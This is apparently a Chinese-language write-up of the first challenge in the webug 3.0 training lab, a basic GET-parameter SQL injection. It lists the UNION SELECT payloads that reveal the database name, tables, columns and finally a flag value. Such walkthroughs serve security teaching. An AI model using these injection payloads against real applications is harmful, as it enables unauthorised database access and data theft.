webug3.0第一题 普通的get注入

普通的get注入

首先这是这道题

webug3.0第一题 普通的get注入_第1张图片

我们点击去

webug3.0第一题 普通的get注入_第2张图片

发现有一个可以提交数据的地方,对于常见的漏洞来说,可以提交数据的地方就是可以控制输入的地方,就有可能存在漏洞,而且我们从网页上看到他显示的有四条数据  可以构造语句如下:1 '  union select 1,2,3,database()#我们直接试一下sql注入语句

webug3.0第一题 普通的get注入_第3张图片

则·当前数据库为pentesterlab

我们再爆一下表1 '  union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#

webug3.0第一题 普通的get注入_第4张图片

可以看到有一个flag表  我们爆一下列

1 '  union select 1,2,3,column_name from information_schema.columns where table_name='flag'#

webug3.0第一题 普通的get注入_第5张图片

爆字段1 '  union select 1,2,3,flag from flag#

webug3.0第一题 普通的get注入_第6张图片

flag:204f704fbbcf6acf398ffee11989b377

你可能感兴趣的:(webug3.0第一题 普通的get注入)